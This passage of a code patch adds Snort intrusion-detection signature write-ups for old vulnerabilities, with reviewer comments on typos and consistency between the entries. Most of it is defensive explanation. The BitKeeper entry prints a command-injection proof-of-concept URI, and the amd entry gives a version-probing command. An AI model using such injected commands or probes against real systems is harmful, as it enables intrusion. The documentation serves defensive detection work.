+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Check the suspect host for signs of infection. Apply patches 
+or upgrade the operating system
+
+--
+Contributors:
+Snort documentation contributed by Timothy Vienneau
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/virus/nimda.asp
+
+F-Secure:
+http://www.f-secure.com/v-descs/nimda.shtml
+
+--
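Review bot: the Impact line calls Nimda a "virus" while the Summary calls it a "worm", and the Detailed Information describes self-propagation over file shares, mass mailing and the IIS unicode exploit, so "Possible infection by the Nimda worm." is the consistent wording. The "Simple", "None known" and "or upgrade the operating system" lines lack the terminating period used in the rest of the set.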
--- /dev/null
+++ b/doc/signatures/1408.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1408
+
+--
+Summary:
+This event is generated when a TCP packet having a large payload was
+detected. This is a possible indication of an actual or impending denial
+of service attack against a host running the Microsoft Distributed
+Transaction Service Coordinator (MSDTC).
+
+--
+Impact:
+Denial of Service (DoS)
+
+--
+Detailed Information:
+MSDTC is used in a distributed or clustered environment for distributed
+transaction processing on Microsoft operating systems,
+
+A vulnerability exists in the handling of large amounts of data sent to
+the MSDTC process listening on port 3372. A packet in excess of 1023
+bytes will cause the service to become unresponsive, a packet in excess
+of 2000 bytes may cause the entire system to become unresponsive.
+
+--
+Affected Systems:
+	Microsoft IIS 5.0
+	Microsoft SQL Server 6.5 throught 2000
+	Microsoft Windows 2000 Advanced Server
+	Microsoft Windows 2000 Datacenter Server
+	Microsoft Windows 2000 Server
+	Microsoft Windows 2000 Professional
+ 
+--
+Attack Scenarios:
+An attacker needs to generate a packet with a payload in excess of 1023
+bytes and send it to port 3372 of an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Linux FTP servers and clients frequently transfer TCP packets having a 
+payload size larger than 1023 bytes. To distinguish a false positive, 
+determine whether MSDTC is running on the indicated destination source and 
+port.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+To manage the vulnerability, configure the system not to autmatically start 
+the MSDTC (Source: Security Operations Guide for Windows 2000 Server). 
+Alternatively, configure firewall rules to limit access to the service. To 
+eliminate false positives, revise the Snort rule to specify IP addresses of 
+only those hosts actually running the service.
+
+--
+Contributors:
+Snort documentation contributed by bmccarty@apu.edu
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Security Tracker:
+http://www.securitytracker.com/alerts/2002/Feb/1003415.html
+
+Microsoft:
+http://www.microsoft.com/TechNet/security/tools/iis4cl.asp
+http://www.microsoft.com/TechNet/archive/transsrv/mtxpg03.asp
+http://www.microsoft.com/TechNet/prodtechnol/sql/maintain/featusability/c08ppcsq.asp
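Review bot: the file is missing the closing "--" separator after the Additional References block (the hunk ends at the last Microsoft URL), which every other signature file in this patch carries; add it. Typos: "Microsoft SQL Server 6.5 throught 2000" should read "through", and "configure the system not to autmatically start" should read "automatically". The first Detailed Information paragraph ends "on Microsoft operating systems," with a comma where a period is needed. In False Positives, "the indicated destination source and port" is unclear; "the indicated destination host and port" matches the intent of checking whether MSDTC is listening on port 3372 there. The blank line after the Affected Systems list contains a stray space.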
--- /dev/null
+++ b/doc/signatures/100000322.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000322
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "mail.php" using a remote file being passed as 
+the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "mail.php" script used by 
+the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
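Review bot: the file begins with two empty lines before "Rule:"; drop them so it starts like the other files. In Detailed Information, "running ona web server" should read "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". "Additional References:" is empty; a reference for the ScozNews "mail.php" / "main_path" issue, if one exists, belongs here.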
--- /dev/null
+++ b/doc/signatures/2639.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2639
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
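Review bot: "a Oracle database implementation" in the Summary should be "an Oracle database implementation". The sentence "make sure that the variable $ORACLE_PORTS is set to a value of "any"" does not say which configuration the variable lives in; it reads as an Oracle setting, but the "$" prefix suggests a Snort rule variable, so name the configuration file explicitly. The Affected Systems entry "Oracle 9i" is indented with spaces while the other files use a tab.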
--- /dev/null
+++ b/doc/signatures/1858.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+1858
+
+--
+Summary:
+This event is generated when an attempt is made to access a critical system file using a directory traversal technique.
+
+--
+Impact:
+Serious. Firewall management configuration files can be accessed. 
+ 
+--
+Detailed Information:
+The Windows filesystem still supports 8.3 filenames. PIX Firewall manager has a folder name with spaces and can be accessed using DOS-Tilde path format: C:/pixfir~1/ for example.
+
+Strict checking for this filename format is not performed by some PIX systems.
+
+--
+Affected Systems:
+Cisco PIX Firewall Manager 4.1.6
+Cisco PIX Firewall Manager 4.2.1
+
+Note: Versions 4.1.6b and 4.2.2 are not vulnerable to this attack.
+
+--
+Attack Scenarios:
+The attacker must have access to port 8181 (or 8080 sometimes). This is usually possible from internal network, so you have probably an internal host that is already compromised by an attacker or someone inside your company network attacks the PIX Firewall manager.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
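Review bot: in Attack Scenarios, "so you have probably an internal host that is already compromised by an attacker or someone inside your company network attacks the PIX Firewall manager" is hard to follow; suggest "so the source is probably either an internal host already compromised by an attacker or an insider targeting the PIX Firewall Manager". The Additional References block is empty yet carries two blank lines before its "--"; trim to the single blank line used elsewhere or add a reference for the 4.1.6 / 4.2.1 issue. "None Known." (False Positives) and "None known" (False Negatives) should be made consistent, and the separator before "Additional References:" has a trailing space.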
--- /dev/null
+++ b/doc/signatures/100000469.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000469
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "iFoto" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "dir" parameter in the "index.php" script used 
+by the "iFoto" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using iFoto
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
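Review bot: the Impact section ("Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing") is the remote file include boilerplate and does not match the cross site scripting vulnerability the Summary and Detailed Information describe; for XSS the impact falls on the client, as the Attack Scenarios text ("a malicious link designed to steal information from a user clicking on that link") already says, so reword Impact to information disclosure on the client side. Likewise the Detailed Information sentence about executing "system binaries or malicious code of the attackers choosing" on the server overstates what the "dir" parameter of "index.php" gives an attacker. The "Sid:", "Affected Systems:" and "Contributors:" blocks lack the blank line before "--".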
--- /dev/null
+++ b/doc/signatures/2733.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2733
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_master_propagation
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
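Review bot: the sentence naming the vulnerable procedure is broken so that the period starts its own line ("vulnerability in the procedure alter_master_propagation" / ". This procedure is included in" / "dbms_repcat."); rejoin it as "vulnerability in the procedure alter_master_propagation. This procedure is included in dbms_repcat." "Oracle Oracle9i" in Affected Systems repeats the vendor name; "Oracle 9i", as in the 2639 file, would do. Several separators are "-- " with a trailing space; trim them. "Additional References:" is empty.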
--- /dev/null
+++ b/doc/signatures/1106.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1106
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
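Review bot: "running ona web server" in Detailed Information should read "running on a web server", and "attackers choosing" (twice) should be "attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." runs well past the wrap width used for the rest of the file; rewrap it.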
--- /dev/null
+++ b/doc/signatures/537.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+537
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
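Review bot: "Windows adminsitrative shares" in Attack Scenarios should be "administrative". The Summary and Detailed Information only say "private or administrative shares"; naming which share access this particular rule matches would help an analyst triage the event, since the text is otherwise identical generic Samba boilerplate.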
--- /dev/null
+++ b/doc/signatures/1955.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1955
+
+--
+Summary:
+This event is generated when a request is made to discover the version and configuration information associated with the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the version of amd running as well as other configuration information about the host.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its version number. A successful request will return the version number along with other valuable configuration information about the server, including the architecture.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the version number associated with amd.  The response may give an attacker valuable configuration information about the host.
+
+--
+Ease of Attack:
+Simple.  Execute the command 'amq -v -T -h hostname/IP'  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
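Review bot: the Corrective Action line "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines." is ambiguous (it reads as denying access to the machines rather than to the RPC services on them); suggest "Filter RPC ports at the firewall so that external hosts cannot reach RPC services." The Additional References block is empty with two blank lines before "--"; trim to one or add a reference. The double spaces after periods throughout this file differ from the single spacing used in the rest of the set.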
--- /dev/null
+++ b/doc/signatures/2462.txt
@@ -0,0 +1,71 @@
+Rule:
+alert ip any any -> any any (msg:"EXPLOIT IGMP IGAP account
+overflow attempt"; ip_proto:2; byte_test:1,>,63,0; byte_test:1,<,67,0;
+byte_test:1,>,16,12; reference:cve,CAN-2004-0176; reference:bugtraq,9952;
+classtype:attempted-admin; sid:2462; rev:1;)
+
+--
+Sid:
+2462
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Ethereal decode of the Internet Group membership Authentication 
+Protocol (IGAP).
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed IGAP packet is decoded using Ethereal
+or tethereal.  This may permit the execution of arbitrary code with root or 
+LOCAL_SYSTEM privilege.  The buffer overflow occurs when a larger than expected
+User Account Size value is discovered in the IGAP payload.
+
+--
+Affected Systems:
+Any host running Ethereal/tethereal versions 0.10.0 - 0.10.2. 
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed IGAP packet, and if decoded by
+a vulnerable version of Ethereal/tethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952:
+
+--
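Review bot: the Bugtraq URL in Additional References carries a stray trailing colon ("http://www.securityfocus.com/bid/9952:"), which breaks the link; drop it. The "Additional References" heading lacks the colon every other file uses. In the Summary, "Internet Group membership Authentication Protocol" should capitalise "Membership" to match the IGAP expansion. This is also the only file in the patch whose "Rule:" field carries the actual rule text; if that is intended, the other files should be filled in the same way, otherwise leave it empty for consistency.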
--- /dev/null
+++ b/doc/signatures/2490.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2490
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with eSignal software. 
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code with
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+eSignal software provides real-time stock market data to client hosts.
+There is a vulnerability associated with eSignal that may cause a buffer overflow,
+permitting the execution of arbitrary code with the context of LOCAL_SYSTEM. 
+The buffer overflow occurs when a larger than expected data payload is supplied
+for certain message exchanges.
+
+--
+Affected Systems:
+eSignal versions 7.5 and 7.6
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed eSignal message that may cause a buffer overflow and 
+allow the subsequent execution of arbitrary code with the context of LOCAL_SYSTEM.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9978
+
+--
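Review bot: the "Additional References" heading is missing its colon (the other files use "Additional References:"). Affected Systems names "eSignal versions 7.5 and 7.6" but Corrective Action only says "Upgrade to the latest non-affected version"; if the fixed version is known, name it. The "Simple. " line has trailing whitespace.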
--- /dev/null
+++ b/doc/signatures/2068.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2068
+
+--
+Summary:
+input handling error in BitKeeper.
+
+--
+Impact:
+Arbitrary code execution
+
+--
+Detailed Information:
+BitKeeper is a cross platform commercial application for managing 
+software development.
+
+When used in daemon mode, BitKeeper opens a listening service that can 
+be accessed via an ordinary http request. The input from this request is
+not correctly processed and allows execution of arbitrary code.
+
+A proof of concept exploit is available for this vulnerability.
+
+--
+Affected Systems:
+All versions of BitKeeper up to and including version 3.0 running in 
+daemon mode.
+
+--
+Attack Scenarios:
+The attacker can send a specially crafted URI to the listening service 
+that contains code the attacker wishes to execute.
+
+Proof of concept URI by Maurycy Prodeus:
+http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to version 3.0.1.
+
+Do not run BitKeeper in daemon mode.
+
+Disallow all access to the BitKeeper server via http.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6588
+
+BitKeeper:
+http://www.bitkeeper.com/
+
+--
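Review bot: the Summary "input handling error in BitKeeper." is a sentence fragment and does not follow the "This event is generated when ..." form used by every other file; suggest "This event is generated when an attempt is made to exploit an input handling error in BitKeeper running in daemon mode." (the Detailed Information already states the daemon-mode condition). "Simple" and "None Known" lack the terminating period used elsewhere in the set.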
--- /dev/null
+++ b/doc/signatures/2757.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2757
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
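Review bot: as in the 2733 file, the procedure name sentence is split so that the period starts its own line ("vulnerability in the procedure create_master_repgroup" / ". This procedure is included in" / "dbms_repcat."); rejoin it as "vulnerability in the procedure create_master_repgroup. This procedure is included in dbms_repcat." "Oracle Oracle9i" in Affected Systems repeats the vendor name, several separators are "-- " with a trailing space, and "Additional References:" is empty.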
--- /dev/null
+++ b/doc/signatures/2072.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2072
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Lyris List Manager.
+
+--
+Impact:
+Unauthorized escalation of user privileges.
+
+--
+Detailed Information:
+Lyris List Manager is a web based mailing list management interface. It 
+is possible for an attacker to gain administrator privileges for mailing
+lists by modifying variables sent to the lyris.pl script.
+
+The variable list_admin is used to identify the user as an 
+administrator, by changing this value from F to T the attacker can 
+identify himself as the mailing list administrator.
+
+--
+Affected Systems:
+	Lyris List Manager 3.0
+	Lyris List Manager 4.0
+
+--
+Attack Scenarios:
+The attacker can save a copy of the HTML interface locally and modify 
+the value of the list_admin variable, then submit the form directly to 
+lyris.pl.
+
+Alternatively the attacker can choose to submit the data in a URI.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches from the vendor.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758
+
+Bugtraq:
+http://www.securityfocus.com/bid/1584
+
+--
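Review bot: the Detailed Information sentence "The variable list_admin is used to identify the user as an administrator, by changing this value from F to T the attacker can identify himself as the mailing list administrator." is a comma splice; split it after "administrator" into two sentences. "Simple" and "None Known" lack the terminating period used in the other files.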
--- /dev/null
+++ b/doc/signatures/1530.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1530
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
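Review bot: the Summary and Detailed Information never say what the rule actually matches; "spurious ftp traffic" could mean anything from a sensitive filename to an overflow attempt, so a reader cannot judge the Impact or the "None Known" False Positives claim. Name the FTP command or content pattern the rule keys on. The Affected Systems section is missing entirely and Additional References is empty. Minor: "Sid: " carries a trailing space, and "None Known" should read "None known." to match the other documents.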
--- /dev/null
+++ b/doc/signatures/3338.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3338
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
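Review bot: "Expoit code exists." under Ease of Attack should read "Exploit code exists." The Attack Scenarios paragraph (a request for a file with an overly long filename via a network share) does not obviously follow from Detailed Information, which describes a malformed RPC request; either relate the long filename to the RPC request or align the two sections. Additional References is empty although the text describes a specific, patched Microsoft vulnerability; the vendor bulletin should be cited. Also "a Denial of Service condition can be issued against a host" reads oddly; "caused on a host" is clearer.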
--- /dev/null
+++ b/doc/signatures/1134.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1134
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
